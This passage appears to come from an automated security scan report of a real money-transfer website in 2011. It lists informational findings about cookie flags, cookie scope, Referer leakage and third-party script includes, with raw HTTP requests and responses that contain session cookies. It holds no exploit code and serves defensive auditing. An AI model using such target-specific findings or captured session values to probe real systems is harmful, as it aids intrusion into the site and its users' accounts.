HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:59 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:59 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "0072843f6a4d9318bbd475ea664b095e2" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:10:52 GMT Content-Length: 27332 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Register G...[SNIP]... </p> <img src="/sendmoneynow/fp/clear.png?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0&m=2" alt="" /> <script src="/sendmoneynow/fp/check.js?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0" type="text/javascript"> </script> <object type="application/x-shockwave-flash" data="/sendmoneynow/fp/fp.swf?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0" width="1" height="1" id="obj_id"> <param name="movie" value="/sendmoneynow/fp/fp.swf?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0"/>...[SNIP]...
4. SSL cookie without secure flag set
previous
next
There are 6 instances of this issue:
Issue background
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
4.1. https://www.xoom.com/sendmoneynow/home
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/home
Issue detail
The following cookie was issued by the application and does not have the secure flag set:loc_1=en_US; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:17 GMT; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sendmoneynow/home HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: xab=91605982107887; BIGipServerprod-http-xoom=436274186.20480.0000
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1Set-Cookie: loc_1=en_US; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:17 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:17 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "07e926f2b2332e30262ece2db8babf40e" Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Wed, 09 Nov 2011 22:10:10 GMT Content-Length: 34003 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml:la...[SNIP]...
4.2. https://www.xoom.com/siteContent/xoom-release-7.0.4/css/ocb/page/home2.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/css/ocb/page/home2.css
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /siteContent/xoom-release-7.0.4/css/ocb/page/home2.css HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/home Cookie: BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 200 OK Cache-Control: max-age=1209600,public Vary: Accept-Encoding Last-Modified: Tue, 08 Nov 2011 20:34:33 GMT ETag: "1573762826" Content-Type: text/css Accept-Ranges: bytes Content-Length: 18588 Date: Wed, 09 Nov 2011 22:10:10 GMT Server: lighttpd/1.4.23Set-Cookie: BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ body{background:url(../../../img/ocb/home2/body-background.png) 0 0 repeat-x;}.newlayout{margin:0 auto;width:960px;}a{color:#17338F;text-decoration:none;}.xoom-header{background:none;padding-bottom:22...[SNIP]...
4.3. https://www.xoom.com/siteContent/xoom-release-7.0.4/css/ocb/xoom-core.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/css/ocb/xoom-core.css
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /siteContent/xoom-release-7.0.4/css/ocb/xoom-core.css HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/home Cookie: BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 200 OK Cache-Control: max-age=1209600,public Vary: Accept-Encoding Last-Modified: Tue, 08 Nov 2011 20:34:33 GMT ETag: "2309043439" Content-Type: text/css Accept-Ranges: bytes Content-Length: 73834 Date: Wed, 09 Nov 2011 22:10:10 GMT Server: lighttpd/1.4.23Set-Cookie: BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ body,html{font:12px arial,helvetica,clean,sans-serif;color:#000;background:#FFF;padding:0;margin:0;}body,div,dl,dt,dd,h1,h2,h3,h4,h5,h6,pre,code,form,fieldset,legend,input,textarea,p,blockquote,th,td{...[SNIP]...
4.4. https://www.xoom.com/siteContent/xoom-release-7.0.4/img/ocb/logo247.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/img/ocb/logo247.png
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /siteContent/xoom-release-7.0.4/img/ocb/logo247.png HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/home Cookie: BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 200 OK Cache-Control: max-age=1209600,public Content-Type: image/png Accept-Ranges: bytes ETag: "2633024821" Last-Modified: Tue, 08 Nov 2011 20:34:28 GMT Content-Length: 1427 Date: Wed, 09 Nov 2011 22:10:10 GMT Server: lighttpd/1.4.23Set-Cookie: BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ .PNG . ...IHDR..............c.....tEXtSoftware.Adobe ImageReadyq.e<...0PLTE.3.E.#......d.H........l...............au.CZ....",tF....tRNS.................#].....IDATx..Z... ..........N....VJ&..L.]\,...[SNIP]...
4.5. https://www.xoom.com/siteContent/xoom-release-7.0.4/js/xoom-core.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/js/xoom-core.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /siteContent/xoom-release-7.0.4/js/xoom-core.js HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/home Cookie: BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 200 OK Cache-Control: max-age=1209600,public Vary: Accept-Encoding Last-Modified: Thu, 27 Oct 2011 23:43:41 GMT ETag: "1069885547" Content-Type: application/x-javascript Accept-Ranges: bytes Content-Length: 40345 Date: Wed, 09 Nov 2011 22:10:10 GMT Server: lighttpd/1.4.23Set-Cookie: BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ (function($){$.extend({metadata:{defaults:{type:"class",name:"metadata",cre:/({.*})/,single:"metadata"},setType:function(type,name){this.defaults.type=type;this.defaults.name=name},get:function(elem,o...[SNIP]...
4.6. https://www.xoom.com/siteContent/xoom-release-7.0.4/js/xoom-init.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/js/xoom-init.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /siteContent/xoom-release-7.0.4/js/xoom-init.js HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/home Cookie: BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 200 OK Cache-Control: max-age=1209600,public Vary: Accept-Encoding Last-Modified: Wed, 09 Nov 2011 00:40:59 GMT ETag: "3532726711" Content-Type: application/x-javascript Accept-Ranges: bytes Content-Length: 108957 Date: Wed, 09 Nov 2011 22:10:10 GMT Server: lighttpd/1.4.23Set-Cookie: BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ /*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Siz...[SNIP]...
5. Cookie scoped to parent domain
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/home
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:loc_1=en_US; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:17 GMT; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
Request
GET /sendmoneynow/home HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: xab=91605982107887; BIGipServerprod-http-xoom=436274186.20480.0000
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1Set-Cookie: loc_1=en_US; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:17 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:17 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "07e926f2b2332e30262ece2db8babf40e" Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Wed, 09 Nov 2011 22:10:10 GMT Content-Length: 34003 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml:la...[SNIP]...
6. Cross-domain Referer leakage
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The page was loaded from a URL containing a query string:https://www.xoom.com/sendmoneynow/signUp?intcid=home2_____signup The response contains the following links to other domains:https://altfarm.mediaplex.com/ad/bn/4770-113961-1193-0?mpt=62e07b9e777846a784d9ceb11d5ca18b&co=1&lg=en&cb=XOOM https://clicktoverify.truste.com/pvr.php?page=validate&url=www.xoom.com&lang=en&sealid=101 https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.XOOM.COM&lang=en https://www.bbb.org/online/consumer/cks.aspx?ID=10312298372137787 https://www.sc.pages05.net/lp/static/js/iMAWebCookie.js?6504a503-12dc860ffe2-37c504b367ce64f028215bda5330c1de&h=www.pages05.net
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form. If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise. You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application. Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure. Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
Request
GET /sendmoneynow/signUp?intcid=home2_____signup HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/home Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876689|session#1320876608475-967538#1320878489; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_visit%3DNew%3B%20s_sq%3Dxoom-prod%253D%252526pid%25253Dhome.home%25252520-xoom%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.xoom.com%2525252Fsendmoneynow%2525252FsignUp%2525253Fintcid%2525253Dhome2_____signup%252526ot%25253DA%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878449571%3B%20s_nr%3D1320876649573-New%7C1323468649573%3B%20s_gpv_pn%3Dhome.home%2520-xoom%7C1320878449575%3B%20s_nr2%3D1320876649578-New%7C1478556649578%3B%20s_vs%3D1%7C1320878449585%3B
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:59 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:59 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "0072843f6a4d9318bbd475ea664b095e2" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:10:52 GMT Content-Length: 27332 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Register G...[SNIP]... <div class="sign-up-media-plex-promo"><img src="https://altfarm.mediaplex.com/ad/bn/4770-113961-1193-0?mpt=62e07b9e777846a784d9ceb11d5ca18b&co=1&lg=en&cb=XOOM" alt="" class="media-plex-placement"/> </div>...[SNIP]... <li> <a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.XOOM.COM&lang=en" rel="external" class="trust-icon icon-verisign"> <span>...[SNIP]... <li> <a href="https://www.bbb.org/online/consumer/cks.aspx?ID=10312298372137787" rel="external" class="trust-icon icon-bbb"> <span>...[SNIP]... <li> <a href="https://clicktoverify.truste.com/pvr.php?page=validate&url=www.xoom.com&lang=en&sealid=101" rel="external" class="trust-icon icon-truste"> <span>...[SNIP]... <!-- silverpopAnalytics --> <script src="https://www.sc.pages05.net/lp/static/js/iMAWebCookie.js?6504a503-12dc860ffe2-37c504b367ce64f028215bda5330c1de&h=www.pages05.net" type="text/javascript"> </script>...[SNIP]...
7. Cross-domain script include
previous
next
There are 4 instances of this issue:
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user. If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
7.1. https://www.xoom.com/sendmoneynow/help/help-center
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/help/help-center
Issue detail
The response dynamically includes the following scripts from other domains:https://www.google.com/jsapi https://www.sc.pages05.net/lp/static/js/iMAWebCookie.js?6504a503-12dc860ffe2-37c504b367ce64f028215bda5330c1de&h=www.pages05.net
Request
GET /sendmoneynow/help/help-center HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/home Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876669|session#1320876608475-967538#1320878469; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20s_sq%3D%3B%20s_gvo_visit%3DNew%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878418506%3B%20s_nr%3D1320876618510-New%7C1323468618510%3B%20s_gpv_pn%3Dhome.home%2520-xoom%7C1320878418513%3B%20s_nr2%3D1320876618519-New%7C1478556618519%3B%20s_vs%3D1%7C1320878418527%3B
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:33 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:33 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:33 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:33 GMT; Path=/ ETag: "093213317f96155bf8a50ec3ad7a86d68" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:10:26 GMT Content-Length: 24002 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Help Cent...[SNIP]... </div><script src="//www.google.com/jsapi" type="text/javascript"> </script>...[SNIP]... <!-- silverpopAnalytics --> <script src="https://www.sc.pages05.net/lp/static/js/iMAWebCookie.js?6504a503-12dc860ffe2-37c504b367ce64f028215bda5330c1de&h=www.pages05.net" type="text/javascript"> </script>...[SNIP]...
7.2. https://www.xoom.com/sendmoneynow/help/how-do-i-pay-for-a-xoom-transaction
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/help/how-do-i-pay-for-a-xoom-transaction
Issue detail
The response dynamically includes the following scripts from other domains:https://www.google.com/jsapi https://www.sc.pages05.net/lp/static/js/iMAWebCookie.js?6504a503-12dc860ffe2-37c504b367ce64f028215bda5330c1de&h=www.pages05.net
Request
GET /sendmoneynow/help/how-do-i-pay-for-a-xoom-transaction HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/help/help-center Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876686|session#1320876608475-967538#1320878486; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_gvo_visit%3DNew%3B%20s_sq%3Dxoom-prod%253D%252526pid%25253Dhelp.Help%25252520Home%25252520-%25252520-xoom%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.xoom.com%2525252Fsendmoneynow%2525252Fhelp%2525252Fhow-do-i-pay-for-a-xoom-transaction%252526ot%25253DA%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878428474%3B%20s_nr%3D1320876628475-New%7C1323468628475%3B%20s_gpv_pn%3Dhelp.Help%2520Home%2520-%2520-xoom%7C1320878428476%3B%20s_nr2%3D1320876628477-New%7C1478556628477%3B%20s_vs%3D1%7C1320878428479%3B
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:38 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:38 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:38 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:38 GMT; Path=/ ETag: "0a0eaf1c85f1c8252ee2fed0286078eb8" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:10:31 GMT Content-Length: 61542 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>How do I ...[SNIP]... </div><script src="//www.google.com/jsapi" type="text/javascript"> </script>...[SNIP]... <!-- silverpopAnalytics --> <script src="https://www.sc.pages05.net/lp/static/js/iMAWebCookie.js?6504a503-12dc860ffe2-37c504b367ce64f028215bda5330c1de&h=www.pages05.net" type="text/javascript"> </script>...[SNIP]...
7.3. https://www.xoom.com/sendmoneynow/home
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/home
Issue detail
The response dynamically includes the following script from another domain:https://www.googleadservices.com/pagead/conversion.js
Request
GET /sendmoneynow/home HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: xab=91605982107887; BIGipServerprod-http-xoom=436274186.20480.0000
Response
